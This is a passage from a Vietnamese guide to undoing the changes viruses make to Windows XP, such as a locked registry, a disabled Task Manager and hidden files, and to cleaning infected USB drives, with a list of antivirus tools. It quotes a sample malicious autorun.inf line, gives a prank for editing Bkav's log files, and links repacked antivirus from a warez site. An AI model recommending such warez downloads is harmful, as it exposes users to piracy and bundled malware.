User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\
Policies\ Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\
CurrentVersion\ Policies\ Explorer
Bên cửa sổ bên phải bạn sẽ thấy một giá trị REG-DWORD có tên là "NoFolderOptions"
Bạn click double để chỉnh sửa giá trị của nó như sau:
Value: 0 - hiện menu , 1 - ẩn menu.
Cách 2
Bây giờ vào Start > Run.
Nếu mục Run bị khoá thì thực hiện theo phần 6 của bài viết này.
Gõ vào GPEdit.msc rồi chọn OK.
Sau đó vào tiếp User Configuration/Administrative Template/Windows
Component/Windows Explorer
Nhấn đúp chuột vào mục REMOVE THE FOLDER OPTIONS... và chọn Disable. Xong
đóng lại, ra Run gõ GPUPDATE /FORCE rồi bấm OK.
3. Không hiển thị được file ẩn
Triệu chứng: Bạn thấy biến mất dữ liệu, không nhìn thấy nó mặc dù biết chắc chắn là nó
vẫn ở đó. Mở Explorer, bấm Menu Tools, chọn Folder Options (nếu không nhìn thấy
Folder Options thì thực hiện mục 2 của bài viết này). Vào tab View/Advanced Settings,
mục "Hidden files and folders". Cho dù bạn có bấm xuống "Show Hidden Files and
Folders" rồi bấm Apply hay OK thì file ẩn vẫn cứ ẩn. Mở lại Setting đó thì nó lại như cũ.
Khắc phục: Mở Notepad ra, copy và dán đoạn mã này vào và save nó lại thành file
ShowHiddenFile.reg
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\
Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000000
"HKeyRoot"=dword:80000001
"HelpID"="update.hlp#51105"
Sau khi save, bạn nhấn đúp chuột vào nó để import vào registry. Nếu cần restart lại máy.
Rồi vào Folder Options để hiệu chỉnh Show Hidden Files and Folder.
4. Bị ẩn (hidden) file và folder dữ liệu
Triệu chứng: Thấy biến mất dữ liệu. Mở Folder Options, chọn show all files lên thì nhìn
thấy dữ liệu tự động bị ẩn (bị đặt thuộc tính Hidden hoặc System). Bỏ check Hidden đi thì
không bỏ được. Thuộc tính System thì Windows đã bỏ không cho sử dụng, mặc dù thuộc
tính này của file vẫn tồn tại.
Khắc phục: Mở cửa sổ Explorer ra, chuyển đến chỗ có chứa các file ẩn, bấm chuột phải
vào đâu đó trên vùng trống của cửa sổ Explorer. Tại menu bật ra, chọn New/Shortcut.
Một cửa sổ Creat Shortcut sẽ xuất hiện. Tại ô Type the location of the item, bạn copy
và dán dòng sau đây vào đó:
attrib.exe -s -r -h
Bấm Next. Tại ô Type a name for this shortcut, bạn đặt tên cho Shortcut, ví dụ như
showfile chẳng hạn. Bạn sẽ có một file shortcut có tên là Showfile.lnk.
Sau đó, bất cứ file hay folder nào bị đặt thuộc tính "không bình thường" (bị Read Only, bị
Hidden, bị System) bạn cứ kéo file hoặc folder đó thả vào biểu tượng của Shortcut
Showfile.
5. Bị khoá Task Manager
Triệu chứng: Bấm Ctrl-Alt-Del, chỉ thấy nhận được thông báo "Task Manager has
been disabled by your administrator".
Khắc phục: Chọn một trong hai cách sau:
Cách 1. Thay đổi Registry
Bấm Start > Run gõ vào Regedit:
Nếu registry bị khoá thì thực hiện theo phần 1 của bài viết này.
Nếu mục Run bị khoá thì thực hiện theo phần 6 của bài viết này.
Tìm đến khoá sau:
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies \System
Tại cửa sổ bên phải, bạn sẽ thấy một giá trị REG-DWORD có tên "DisableTaskMgr"
Bạn click double để chỉnh sửa giá trị của nó như sau:
Value: 1= Cấm Task manager.
Value: 0= Mở khoá TaskManager.
Hoặc đơn giản là xoá đi, bạn sẽ mở được Task Manager.
Cách 2. Dùng Administrative Tool

Bây giờ hãy vào START --> RUN
Nếu mục Run bị khoá thì thực hiện theo mục 6 của bài viết này.
Gõ vào GPEdit.msc rồi chọn OK
Ở cửa sổ Group Policy settings, chọn User Configuration\Administrative
Templates\System
Chọn Options Ctrl+Alt+Delete
Chọn Remove Task Manager
Nhấn đúp chuột vào vào mục Remove Task Manager và chọn Disable.
Xong đóng lại, ra Run gõ GPUPDATE /FORCE rồi bấm OK.
6. Mất mục Run
Triệu chứng: Đáng nhẽ ở menu Start, phải có mục Run để chúng ta chạy các phần mềm
không nằm trong Start Menu. Nhưng giờ nó đã biến mất.
Khắc phục: Bấm Start/All Programs/Accessories. Mở Command Prompt.
Cửa sổ Command Prompt sẽ xuất hiện. Giờ thì gõ thẳng "Regedit.exe" vào dòng lệnh
của Command Prompt. Bạn sẽ mở được Registry Editor.
Bạn tìm đến khoá sau:
HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\
Advanced
Ở cửa sổ bên phải, Bạn sẽ thấy một giá trị REG-DWORD với tên "StartMenuRun".
Sửa giá trị thành 0 nếu muốn tắt, 1 nếu muốn khoá.
Hoặc đơn giản là xoá nó đi. Khởi động lại máy.
Dùng phần mềm :

1. VNFix1.1 : Công cụ giúp phục hồi các thiết
lâp cho xem Task Manager, Registry, Folder
Option, hiện file ẩn, hiện phần mở rộng, hiện file
hệ thống.
Ngoài ra, công cụ còn cho phép kiểm tra trong hệ
thống có những thay đổi các thiết lập trên hay
không, điều này khá thuận tiện.
Chương trình có giao diện bằng Tiếng Việt nên rất
dễ sử dụng.
Download :
http://www.baongay.com/dl/vn_fix1.rar
2. [FireLion] Enabler 2.0 : Ngoài phục hồi các

thiết lập như cho phép hiển thị Task Manager,
Folder Options, hiện file ẩn, làm việc trên
registry... Công cụ này còn cho phép điều chỉnh
lại trang chủ (Home page), hiệu chỉnh lại Startup
Menu.
Công cụ này nằm trong bộ [FireLion] All Tools
In One. Công cụ này có sẵn khi bạn cài đặt
[FireLion]FastHelper.
Trong bộ [FireLion] All Tools In One còn hỗ
trợ 2 công cụ hữu ích khác là :
- [FireLion]AutorunsFixer 1.3 giúp bạn có thể
quản lý các tập tin autorun.inf.
- [FireLion]Process Manager 2.0 giúp bạn
quản lý tiến trình với các chức năng căn bản.
Download : www.fire-lion.com
Bị LogOut khi vừa hiện màn hình Desktop

Mọi việc khởi động đều suôn sẻ từ khi bạn bấm nút Power để khởi động máy, cho đến khi
xuất hiện màn hình Desktop thì lập tức bạn bị LogOut ra màn hình chọn tên sử dụng để
đăng nhập. Bạn cố sức chọn các tài khoản khác nhau để khởi động nhưng đều vô dụng.
Ðây là lỗi không tìm thấy file UserInit trong hệ thống (Bạn có thể tìm hiểu key này ở
phần trên).
Tôi đã thấy rất nhiều người dùng khi gặp lỗi này đành ngậm ngùi cài đặt lại máy tính của
họ. Trên thực tế không nhất thiết phải làm như vậy, chúng ta sẽ lần lượt được biết các
cách phục hồi hệ thống như sau.
Có một điều tôi lưu ý với các bạn là Windows luôn tìm cách bảo vệ một số file (Không cho
xóa, hay sửa đổi các file này) trong đó có file userinit.exe. Vì vậy hầu như không có virus
tìm cách thay thế hay sửa đổi file này mà chúng thường chỉ thay đổi giá trị trong key
UserInit của registry.
Cách 1 : Phục hồi hệ thống nếu biết giá trị của key UserInit
Mỗi virus sẽ có một giá trị nhất định ghi trong key UserInit
Ví dụ :
Virus w32.vbvn.rootkit ghi giá trị : C:\Windows\system32\runxpro.exe
Lúc này, bạn chỉ việc khởi động trên nền Dos (Bạn có thể khởi động bằng các đĩa Boot)
bạn chỉ việc copy tập tin userinit.exe gốc (Nếu thư mục hệ thống là C:\Windows thì tập
tin đó sẽ có đường dẫn là C:\windows\system32\userint.exe ).
Tuy nhiên, tôi sẽ không đi sâu vào cách này bởi vì trong thực tế người dùng rất ít khi để ý
đến giá trị của key này (Khi hệ thống có trục trặc, thì họ mới thường tìm cách biết nó là
gì).
Cách 2 :
Phục hồi key UserInit.exe ngay cả khi không biết giá trị của key UserInit.
Ðều này đồng nghĩa với việc bạn sẽ truy cập và chỉnh sửa registry ngay cả khi bạn chưa
cần vào hệ điều hành.
Để Boot bằng các đĩa CD cứu hộ này, bạn cần phải có nhất thiết lập nhất định để có thể
Boot bằng các đĩa này. Với các BIOS khác nhau thì có cấu trúc thiết lập khác nhau, nên
trong vấn đề này tôi sẽ không đi sâu mà chỉ tập trung các thao tác để cứu hộ sau khi đã
Boot thành công.
Bạn có thể sử dụng công cụ Avast!Registry Editor trong đĩa miniPE (Start ->
Programs -> Registry Tools -> Avast!Registry Editor), hay Remote (RunScaner)
trong đĩa XPE (Start -> All Programs -> RegEdit -> Remote (RunScaner) )
Việc truy cập và chỉnh sửa registry được thực hiện giống như trong Windows bình thường.
Bạn truy cập vào key HKLM\SOFTWARE\Microsoft\Windows
và ghi giá trị sau C:\Windows\System32\userinit.exe (Với C:\Windows là thư mục cài
đặt hệ điều hành).
Ngoài ra, trong trường hợp xấu, tập tin userinit.exe không tồn tại hoặc đã bị virus sửa
đổi thành công. Bạn có thể vào thư mục i386\system32 của đĩa CD để tìm tập tin
userinit.exe rồi copy sang thư mục C:\Windows\system32\userinit.exe.
Khởi động máy tới màn hình Desktop thì dừng lại
Một số máy tính sau khi bị máy tính phá hoại, khi khởi động máy trở lại bình thường cho
đến màn hình Desktop thì dừng lại mà không xuất hiện các Icon, thanh Start...
Nếu hộp thoại Windows Task Manager không bị chặn lại
Để khắc phục lỗi này bạn nhấn tổ hợp phím Ctrl +Alt + Delete để gọi Windows Task
Manager.
Trong hộp thoại Windows Task Manager bạn chọn thẻ Applications. Bạn chọn New
Task... Hộp thoại Create New Task bạn nhập vào explorer.exe . Rồi ấn chọn OK.
Sau đó bạn vào registry và chỉnh sửa lại giá trị của key Shell trở về giá trị ban đầu trước
khi bị virus phá hoại.
Gía trị mặc định : explorer.exe (Hay C:\Windows\explorer.exe)
Nếu hộp thoại Windows Task Manager bị chặn lại
Lúc này bạn không thể sử dụng các công cụ như registry để soạn thảo.
Bạn có thể sử dụng các thao tác cứu hộ như đã thực hiện với key UserInit tôi đã trình bày
ở phía trên để phục hồi giá trị giá trị của key Shell như ban đầu.
Sau khi thực hiện xong bạn tiến hành khởi động lại máy tính.
V. Một số kỹ thuật khác
Để Internet Explorer an toàn hơn
Để tránh việc bị virus lây nhiễm qua những
đoạn mã VBScript bạn chỉ cần thực hiện các
thao tác thiết lập sau (Thao tác được tôi thực
hiện trên Internet Explorer 6) :
Trong cửa sổ làm việc của Internet Explorer
bạn chọn Tool -> Internet Options... ->
Chọn thẻ Security -> Chọn Internet ->
Default Level.
Bạn chú ý đến một thanh kéo sẽ xuất hiện,
nếu bạn chọn High có nghĩa là mức an ninh
cao nhất, điều này đồng nghĩa các tất cả ứng
dụng như các Script, các ActiveX hay Java hay
ngay cả việc download file... đều sẽ bị chặn.
Rõ ràng như vậy là quá bất tiện.
Theo tôi bản chỉ nên chọn mức Medium bấm
Apply rồi chọn Custom Level..., cửa sổ
Security Settings sẽ xuất hiện. Bạn kéo
xuống để thấy các tùy chọn về Scripting.
Để chặn việc chạy các Script bạn có thể chọn
Disable cho 2 mục Active scripting và
Allow paste operations via script.
Sau đó bạn chọn OK, và cuối cùng bạn bấm OK một lần nữa ( Trong cửa sổ Internet
Explorer).
Bây giờ bạn có thể thoải mái hơn khi truy cập các trang web với thiết lập vừa rồi.
Không cho virus lây qua Yahoo Messenger gửi thông điệp
Như đã phân tích ở phần trên, các virus lây truyền qua Yahoo Messenger liên tục giả lập
hang loạt thao tác của bàn phím để gửi thông điệp đến những nạn nhân tiếp theo. Để
ngăn chặn chúng gửi thông điệp của chúng, chúng ta sẽ sử dụng chính đặc điểm này của
chúng. Cụ thể ở đây, chúng ta sẽ vô hiệu hóa tính năng Enter dể gửi đi một thông điệp,
thay vào đó bạn bắt buộc phải ấn vào nút Send cho mỗi thông điệp gửi đi.
Làm như vậy, khi virus gửi thông điệp thì chỉ thực
hiện đến hết thao tác nhập thông điệp vào ô
nhập thông điệp rồi dừng lại mà thể gửi đi thông
điệp (Phím Enter của virus giả lập vẫn được thực
hiện, tuy nhiên lúc này phím Enter đó sẽ không
thể gửi thông điệp được).
Chúng ta sẽ cấu hình lại Yahoo Messenger như

sau:
Trong cửa sổ Yahoo Messenger chúng ta chọn
Messenger -> Preferences. Cửa sổ Yahoo!
Messenger Preferences sẽ xuất hiện. Bạn tiếp
tục chọn Messenges. Trong khung Pressing
Enter in a message windows : bạn nhấn chọn
Inserts a new line in the message rồi ấn OK.
Kiểm tra 1 liên kết có virus hay không

Chúng ta đã nói về lý do tại sao lại bị nhiễm virus ngay chỉ khi chúng ta truy cập vào một
trang nào đó. Bạn thắc mắc làm thế nào chúng ta nhận ra một trang web nào đó có mang
theo những đoạn mã nguy hiểm kia không ? Tôi sẽ hướng dẫn vấn đề này tại phần này.
Bạn truy cập vào địa chỉ sau : http://online.drweb.com/?url=1 , sau đó nhập liên kết mà
bạn muốn kiểm tra xem có chứa những đoạn mã hay không vào rồi bấm SCAN!. Chời đợi
trong giây lát, sẽ có một cửa sổ nhỏ hiện ra báo cho bạn kết quả.
Thông báo liên kết sạch Thông báo liên kết chứa mã độc
Nhận biết nhanh virus giả dạng thư mục
Một thủ thuật nhỏ sau đây sẽ giúp bạn an toàn hơn khi quản lý hệ thống với Windows
Explorer.
Để làm được điều này, bạn thiết lập như sau : Trong cửa sổ Windows Explorer đang làm
việc, bạn chọn : View -> Ấn chọn Status bar.
Bây giờ, chúng ta nhắc lại một chút về virus giả dạng thư mục. Chúng sẽ có icon giống thư
mục, nhưng bạn nên nhớ nó vẫn là 1 file. Chúng ta sẽ sử dụng sự khác nhau này để dễ
dàng nhận ra virus giả dạng thư mục.
Bạn hãy tập một thói quen nhỏ như thế này, mỗi khi định vào một thư mục nào đó, thay
vì bạn nháy đúp nhanh vào chúng bạn hãy chọn chúng mà thôi.
Bạn sẽ dễ dàng nhận ra điều sau :
- Nếu đối tượng bạn chưa chọn đối tượng nào thì thanh trạng thái (Status bar) bên dưới sẽ
hiển thị tổng số đối tượng của thư mục đó và tổng dung lượng của thư mục đó.
- Nếu bạn chọn một đối tượng là thư mục thì trong phần bên trái của thanh này sẽ hiện 1
objects và khung ngay bên cạnh nó sẽ không có giá trị nào.
- Nếu bạn chọn một đối tượng là tập tin thì trong phần bên trái khung trạng thái sẽ hiển
thị các thông tin về file ấy (Với file .exe thì sẽ hiển thị các thông tin : File version,
Company...) và ở ô ngay bên phải của ô này là dung lượng file.
Như vậy bạn có thể dễ dàng nhận ra và phân biệt được chúng.
Nhanh chóng chúng ta nhận ra rằng, chỉ cần chọn trước thư mục muốn vào, nếu thấy
thông số dung lượng xuất hiện thì chắc chắn đây là virus giả dạng thư mục.
Còn thư mục ban đầu đã ở đâu ? Nhiều khả năng chúng đã bị ẩn đi, đi khắc phục bạn đọc
phần phía trên có tên Phục hồi các thư mục ẩn.
Làm sao để diệt chúng ? Bạn hãy coi phần ngay bên dưới.
Làm sạch USB

Các USB sau khi sử dụng trên các máy tính nhiễm virus lây lan qua USB sẽ bị nhiễm virus
theo. Các các lây nhiễm bạn có thể đọc ở phần trên của tài liệu, sau đây tôi sẽ trình bày
cách để làm sạch USB tùy trường.
1. Với virus tạo autoruns.inf :
Bạn có thể thiết lập lại hệ thống để có thể nhìn thấy file ẩn rồi xóa file autoruns.inf vào file
ghi trong có giá trị được khởi động.
Để biết giá trị này bạn có thể dùng Notepad để đọc file autoruns.inf.
Ví dụ với nội dung file Autoruns.inf trong USB có giá trị như sau :
[Autorun]
OPEN=boot.pif
Thì file sẽ được USB khởi động khi Autorun (Ở đây tôi đang xét nó chính là virus) có đường
dẫn như sau : Tên đĩa USB:\boot.pif
Như vậy bạn chỉ cần vào thư mục gốc của USB và xóa file boot.pif là được.
Bạn nên để ý, phần lớn virus sẽ tự đặt chế độ ẩn (Hidden) và sẽ thiết lập lại máy bạn để
bạn không thể xem file ẩn với Windows Explorer. Bạn có thể xem phần Không hiển thị
được file ẩn ở phía trên để thiết lập lại việc xem các thư mục và tập tin ẩn, hoặc đơn giản
hơn là sử dụng các phần mềm quản lý file như : Total Commander, Norton
Commander hay Far Manager để có thể làm việc với các thư mục cũng như file ẩn.
2.Với virus đánh lừa người dùng qua biểu tượng
Các loại virus này sẽ có biểu tượng giống hình thư mục nên trong khi thao tác bạn thường
hay bị nhầm lẫn.
Tuy nhiên, đây lại chính là điểm mà bạn có thể tận dụng để diệt thủ công các loại virus
này trong USB. Tận dụng bằng cách tìm kiếm tất cả các tập tin thực thi trong đĩa USB có
biểu tượng là hình thư mục.
Bạn thực hiện theo các bước sau :
1. Trong Windows Explorer (Nếu bạn không biết Windows Explorer là gì thì bạn hãy mở
My Computer).
2. Trên thanh công cụ bạn chọn nút Search.
3. Xuất hiện 1 khung với câu hỏi : What do you want to search for ? . Bạn chọn All
files and folders .
4. Trong ô All or part of the file name bạn nhập vào giá trị “.exe or .scr” (Không có
dấu “).
Sở dĩ chúng ta phải tìm với cả 2 loại file .exe và .scr là vì không chỉ file .exe mới là file
thực thi có thể có biểu tượng hình thư mục mà cả file .scr cũng có thể có điều này.
Trong ô Look in : bạn chọn ổ đĩa USB.
5. Bạn bấm Search để tiến hành việc tìm kiếm.
Như bạn thấy trong hình, các loại tất cả các loại file .exe hay .scr đều được hiển thị, bằng
mắt bạn có thể nhận ra các virus và dễ dàng xóa chúng.
Tuy nhiên bạn cần lưu ý :

Việc xóa virus khỏi đĩa USB khi virus đã dừng hoạt động trên máy bạn.
Không chỉ có file .exe và .scr được hiển thị mà đôi lúc cả thư mục hay các tài liệu khác
cũng được hiển thị trong kết quả. Sở dĩ như vậy là do các tên file hay thư mục đều có
quyền dùng ký tự “.”, điều này đồng nghĩa người dùng có thể đặt tên một tài liệu nào đó
mang tên : TaiLieu.exe.doc hay một thư mục nào đó mang tên Love.exe.
Để tránh việc xóa nhầm chúng bạn nên chú ý như sau :
- Với các tài liệu dạng như TaiLieu.exe.doc thì bạn an tâm, chúng thường có biểu tượng
khác nên bạn có thể nhận ra mà không xóa nhầm chúng.
- Với các thư mục, bạn để ý nhìn vào thông số Size. Các thư mục sẽ không có thông số
Size. Điều này giúp bạn nhận ra và tránh xóa nhầm chúng.
Một số virus cố tình ẩn các thư mục trong máy tính đi, thay vào đó là sự xuất hiện 1 bản
của chính virus đó và có tên trùng với thư mục kia. Điều này làm người dùng nhầm tưởng
file do virus tạo ra lại là thư mục mình muốn làm việc và kích hoạt virus làm việc. Với loại
virus này bạn cần áp dụng cách này và một phần ở trên là khắc phục Bị ẩn (hidden) file
và folder dữ liệu.
Tránh Autorun của USB

Có nhiều cách để bạn tránh bị nhiễm virus qua chế độ autorun. Dễ dàng nhất là dùng các
phần mềm như đã nêu ở 1. Với virus tạo autoruns.inf ở phần Làm sạch USB.
Nhưng nếu máy tính bạn chưa có sẵn chúng hay đơn giản là bạn đã quen với Windows
Explorer thì sau đây là cách bạn cần làm.
Ngay tại cửa sổ hiển thị các ổ đĩa (My Computer) bạn nhập trực tiếp đường dẫn của đĩa
bạn muốn truy cập vào thanh Address và nhấn Enter.
Ví dụ tên đĩa bạn muốn truy cập là E thì bạn bạn nhập E:\ vào thanh Address và nhấn
Enter.
Một số loại virus (Như Kavo) cũng sử dụng cách khởi động bằng autorun nhưng không chỉ
với đĩa USB mà cả các đĩa chính không máy. Vì vậy khi diệt loại virus này bạn cũng cần
phải truy cập các ổ đĩa trong máy bằng cách này.
Nghịch Bkav
Với Virus List

Bkav là phần mềm diệt virus nổi tiếng nhất
Việt Nam hiện nay, giao diện dễ dùng, với
một sự đầu tư rất kỹ lưỡng của tập thể những
chuyên gia an ninh mạng của Bkis. Không vì
vậy vậy mà Bkav không có điểm yếu.
Trong bài viết này, sẽ hướng dẫn cho mọi
người biết một trong những điểm “Vui tính”
của Bkav.
Điều đều tiên các bạn cần làm là cài đặt Bkav
và chạy nó ở chế độ chạy nền.
Trong thư mục cài đặt của Bkav (Ví dụ ở máy
tôi là C:\Program Files\Bkav2006 ) bạn sẽ
thấy file BKAV.VRL.
Bạn hãy mở nó ra bằng Notepad nào.
Thay đổi nó bằng bất kỳ cách nào bạn muốn. Bạn chú ý, cần giữ lại cấu trúc của nó
Ví dụ bạn sẽ thấy 1 dòng như sau : W32.YMDungcoiA.Worm|xxxx|Worm
thì bạn đừng xóa mất mấy cái dấu “|” đấy nhé
Giờ bạn lưu nó lại nào.
Bạn mở Bkav lên vào xem Virus List của nó. Chắc chắc sẽ có điều thú vị đấy.
Tuy nhiên, bạn nên chú ý là cách này chỉ làm hiển thị khác đi trong virus list của Bkav
thôi. Còn khả năng diệt virus vẫn còn y như cũ. Nhưng trong lần khởi động Bkav sau thì
những gì bạn đã sửa chữa sẽ mất tác dụng.
Nhật ký
Cũng vào thư mục như bên trên, nếu
phần nhật ký hiện tại của Bkav không
là trống, bạn sẽ thấy file Bkav.log
(Nếu Bkav đang chạy với tùy chọn
hiển thị là Tiếng Việt). Bây giờ bạn
dung Notepad mở nó và chọn font hiển
thị là .vnTime .
Bạn sẽ thấy một số ký tự không thể
hiển thị (Là các ô vuông). Khi chỉnh
sửa bạn không được sửa chữa các ký
tự này, còn các dữ liệu kia bạn có thể
thoải mái thay đổi (Bạn có thể ghi
Tiếng Việt). Sau đó lưu lại.
Bạn có thể dễ dàng biến thẻ nhật ký của Bkav thành nhật ký của... mình.
Bạn cũng nên chú ý, do Bkav dùng 2 ngôn ngữ nên sẽ có 2 file nhật ký khác nhau (File
còn lại là BKAVE.log . Nếu bạn chọn ngôn ngữ nào thì Bkav sẽ dung nhật ký tương ứng với
file của ngôn ngữ đó. Do vậy khi bạn viết nhật ký nên để ý ngôn ngữ Bkav đang dung hiện
tại.
Chương 4 : Một số phần mềm cần biết

Phần mềm giúp nhận dạng và tiêu diệt
ProcessXP : Phần mềm cho phép quản lý các tiến trình đang chạy trong hệ thống. Không
chỉ là quản lý các tiến trình đơn giản như Task Manager, ProcessXP còn cho phép bạn dễ
dàng xem đường dẫn, icon, xem tiến trình theo kiểu cây...
Download : http://download.sysinternals.com/Files/ProcessExplorer.zip
Autoruns : Cũng là chương trình quản lý các chương trình khi khởi động như MSConfig
nhưng Autoruns liệt kê đầy đủ hơn rất nhiều. Ngoài ra cũng như ProcessXP, chương trình
liệt kê đầy đủ các thông tin như đường dẫn, hiển thị icon, báo lỗi khi khóa khởi động đó
không còn hợp lệ (File được khởi động ở khóa đó không còn tồn tại)...
Download : http://download.sysinternals.com/Files/Autoruns.zip
HijackThis : Chương trình cho phép liệt kê và phục hồi thông tin về các tiến trình, các
khóa khởi động và một số thông tin quan trọng khác. Việc này rất hiệu quả nếu bạn muốn
chia sẻ tình trạng máy mình cho người khác (Như trên các forum) để xác định tình trạng
của máy mà không cần phải tới trực tiếp máy đó.
Download : http://www.spywareinfo.com/~merijn/files/hijackthis.zip
SystemSnapShot : Là phần mềm tương tự HijackThis nhưng chỉ cho phép liêt kê và lưu
trữ các thông tin trên máy tính đó. Bù lại chương trình có liệt kê mã MD5 của một số file.
Việc này giúp việc xác định máy có tồn tại virus dễ dàng hơn rất nhiều.
Download : http://fasthelper.fire-lion.com/download/SystemSnapShot.zip
Phần mềm chống virus
Một số phần mềm chống virus của Việt Nam

Bkav
Phần mềm diệt virus có giao diện đơn giản, dễ dùng, chức năng diệt khá tốt, ít tốn tài
nguyên hệ thống, tốc độ quét nhanh.
Tuy nhiên, phần mềm không nhận dạng và cảnh báo những thao tác cơ bản của virus.
Download : www.bkav.com.vn
[FireLion]FastHelper
Ít ngốn tài nguyên, quét nhanh, có khả năng nhận ra các thay đổi tai các khóa khởi động
trong registry, nhận dạng và cảnh báo với một số thao tác của virus thường làm.
Tuy nhiên, phần mềm hiện nay có bảng mã nhận dạng virus còn rất nhỏ nên chưa thể
đem lại sự an toàn cho bạn.
Download : www.fire-lion.com
MoonAV
Phần mềm diệt virus nằm trong bộ sản phẩm đã từng đạt giải nhất Trí Tuệ Việt Nam trước
đây. Bảng mã nhận dạng virus khá lớn nên khả năng nhận dạng và tiêu diệt virus rất tốt,
tác động sâu vào hệ thống...
Tuy nhiên phần mềm rất tốn tài nguyên bộ nhớ khi chạy, tốc độ quét khá chậm.
Download :
http://downloads.sourceforge.net/moonav/MsavSetup.2.2.2.160.exe?use_mirror=surfnet
D32
Phần mềm diệt virus của tác giả Trương Minh Nhật Quang. Có khả năng nhận dạng và diệt
virus tốt, ít tốn tài nguyên hệ thống khi hoạt động. Tuy nhiên bảng nhận dạng ít, không có
khả năng nhận dạng các thao tác thông thường của virus, cập nhật chậm...
Download :
Bản Full : http://www.echip.com.vn/echiproot/Softwares/d32/d32004full.zip
Bản Lite :http://www.echip.com.vn/echiproot/Softwares/d32/d32004lite.zip
Bản cập nhật (25/5/2007) : http://echip.com.vn/echiproot/Softwares/d32/d32ud2505.exe
Một số phần mềm của nước ngoài

Sau đây là bảng đánh giá các phần mềm diệt virus tốt nhất của năm 2007 do PCWorld Mỹ
thực hiện. Đây là một tư liệu quan trọng để các bạn lựa chọn một phần mềm diệt virus
thích hợp.
Giải thích một số thuật ngữ :
Malware :
Phần mềm ác tính là một loại phần mềm hệ thống do các tay tin tặc hay các kẻ nghịch
ngợm tạo ra nhằm gây hại cho các máy tính. Tùy theo cách thức mà tin tặc dùng, sự nguy
hại của các lọai phần mềm ác tính có khác nhau từ chỗ chỉ hiển thị các cửa sổ hù dọa cho
đến việc tấn công chiếm máy và lây lan sang các máy khác như là virus trong cơ thể của
các sinh vật.
Phần mềm ác tính còn có tên là ác liệu hoặc phần mềm độc hại, hay được dùng nguyên
gốc Anh ngữ là malware. Chữ gốc Anh ngữ malware là sự ghép của hai chữ malicious và
software.
Proactive :
Ở đây các phần mềm chống virus sẽ nhận dạng các thao tác nhất định mà các virus
thường thực hiện như ghi vào registry, tạo file, xóa file...
Làm Mức
Phát hiện Nhận dạng Nhận
Thứ chậm độ dễ
Điểm Chương trình Malware Proactive dạng Đánh giá chung Trang chủ
tự hệ sử
(%) (%) sai
thống dụng
Khả năng phát hiện và
Kaspersky Xuất
1 85 96 51 10 6 xử lý nhanh hơn hẵn www.kaspersky.com
Anti-Virus 6 sắc
các AV khác
Sysmantec Khả năng phát hiện và
Xuất
2 84 Norton 96 49 10 3 làm sạch virus rất www.symantec.com
sắc
AntiVirus 2007 nhanh
Khả năng phát hiện
BitDefender Xuất virus tuyệt vời, tuy
3 84 96 61 124 14 www.bitdefender.com
Antivirus 10 sắc nhiên ngốn khá nhiều
tài nguyên hệ thống
Bảo vệ máy khỏi
4 84 Eset NOD32 90 79 5 Rất tốt 6 Malware tốt, tuy nhiên www.eset.com
giao diện hơi khó dùng
Khả năng tự động bảo
Panda vệ rất tốt, phát hiện
5 79 90 56 4 Rất tốt 3 www.pandasecurity.com
Antivirus 2007 malware trung bình và
làm sạch virus kém
Alwil Avast 4 Khả năng phát hiện
6 78 Antivirus 92 37 4 Khá 5 virus tốt, nhưng giao www.avast.com
Professional diện không thân thiện
Đứng vị trí trung bình
về khả năng phát hiện
Grisoft AVG 7.5
malware, nhưng cuối
7 77 Antivirus 91 34 2 Khá 1 http://free.grisoft.com
bảng trong chức năng
Professional
bảo vệ proaction và
giao diện
Trend Micro
Khả năng phát hiện
Antivirus plus
8 71 82 43 9 Rất tốt 0 virus kém nhất trong 8 http://us.trendmicro.com
AntiSpyware
phần mềm trên
2007
Một số phần mềm khác :
1. Avira AntiVir PersonalEdition Classic 7 :
http://www.download.com/3001-2239_4-
10808072.html?spi=231a59b4b19fa79372b4bc989b78d613&part=dl-10322935
2. Comodo AntiVirus :
http://download.comodo.com/cav/download/CAVS_Setup_2.0.17.58_Beta.exe
3. ClamWin :
http://downloads.sourceforge.net/clamwin/clamwin-0.92-setup.exe
4. PC Tools AntiVirus Free Edition :
http://www.pctools.com/mirror/avinstall.exe
5. McAfee VirusScan Plus 2008 :
http://www.download.com/McAfee-VirusScan-Plus/3000-2239_4-10582866.html
6. Ad-Aware :
http://www.download.com.vn/Virus+Spyware+Malware+Trojan/Anti+Virus+Spyware+Mal
ware+Trojan/Software-4741/Ad-Aware+2007
7. Spybot S & D :
http://www.download.com/Spybot-Search-Destroy/3000-8022_4-10743107.html?tag=lst-
1
8. Spyware Guard :
http://www.download.com/SpywareGuard/3000-8022_4-10514468.html?tag=lst-7
Một số bản portable các phần mềm chống virus :

Các bản Portable khá hữu dụng nếu bạn phải thường xuyên sử dụng các máy tính khác
nhau.
1. Portable Kaspersky Internet Security 7.0.0.125
http://www.mediafire.com/?8gm4yem9lty
2. Portable Norton AntiVirus 2007
http://rs289.rapidshare.com/files/73676866/Portable_Symantec_Norton_Antivirus.rar
3. Portable Spyware Doctor 5.0.1
http://rs11.rapidshare.com/files/58574386/SpyD.Portable_5.0.1.200_by__preet5_cyberw
arez.info.exe
Password để giải nén : www.cyberwarez.info
4. Portable AVG Anti-Spyware Plus 7.5.1.43
http://www.mediafire.com/?9imvxnultom
Password để giải nén : blogtinhoc.net
Quét virus online

Đôi khi bạn cam thấy chưa chắc chắn khi quét virus cho hệ thống bằng một phần mềm
diệt virus duy nhất, hay bạn e ngại việc cài phần mềm diệt virus vào máy. Bạn có thể quét
virus trực tuyến qua các địa chỉ sau :
http://enterprises.pandasoftware.com/products/activescan/
http://security.symantec.com/sscv6/vc_scan.asp?langid=ie&venid=sym&plfid=23&pkj=VB
BYNBRFNJSVSTIVVBE&vc_scanstate=2
http://housecall.trendmicro.com/housecall/start_corp.asp
http://www.kaspersky.com/virusscanner
http://www.bitdefender.com/scan8/ie.html
Dù việc quét virus trực tuyến là khả hữu dụng, tuy nhiên những công cụ trên không thể
